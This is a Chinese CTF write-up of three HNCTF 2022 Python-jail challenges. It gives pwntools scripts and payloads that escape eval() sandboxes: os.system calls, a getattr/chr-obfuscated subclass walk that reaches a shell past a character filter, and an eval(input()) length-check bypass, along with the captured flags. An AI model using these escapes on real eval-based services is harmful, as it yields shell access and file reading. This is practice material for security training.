我感觉似乎基本所有的jail,都可以用unicode绕过,除非靶机加了ASCII过滤,不然首要payload都可以尝试一下unicode
[HNCTF 2022 Week1]calc_jail_beginner(JAIL)
- 分析靶机源码能直接发现使用了
eval()
函数 - 也可以直接用注释第二行给出的payload了
- 所以直接用nc连接,这里懒得用linux或者ncat
- 直接用pwntool连接,脚本如下
from pwn import *
payload = b"__import__('os').system('cat flag')"
addr = "node5.anna.nssctf.cn:20057".split(":")
ip,port = str(addr[0]),int(addr[1])
p.sendline(payload)
p.interactive()
- NSSCTF{11ea59d6-d0fe-4929-8f8a-b18371581169}
[HNCTF 2022 Week1]calc_jail_beginner_level1(JAIL)
- 可以发现使用了过滤器过滤了输入中的
"\'`ib
().__class__.__base__.__subclasses__()
此方法可以获得所有子类- 用getattr()来替换违禁词,得到第一步payload
getattr(getattr(().__class__,chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)),chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()
- 找到此类,继续构造payload
().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')
- 同样用getattr()替换
getattr(getattr(getattr(getattr(().__class__,chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)),chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4],chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)),chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))
- 然后就拿到shell,可以ls>cat flag
- NSSCTF{0b75ccd3-0745-4087-b1ac-37930727afa0}
[HNCTF 2022 Week1]calc_jail_beginner_level2(JAIL)
- 这题限制了输入长度不能大于13
- 注意到只对第一次的输入进行了长度检测
- 可以构造payload为
eval(input())
- 用于通过检测,并再一次获取输入
- 再用payload拿到shell
from pwn import *
payload = b"eval(input())"
addr = "node5.anna.nssctf.cn:28304".split(":")
ip,port = str(addr[0]),int(addr[1])
p = remote(ip,port)
p.sendline(payload)
payload = b"__import__('os').system('sh')"
p.sendline(payload)
p.interactive()
- ls>cat flag拿到NSSCTF{30a8f658-fb4f-44be-917e-80218b82f27b}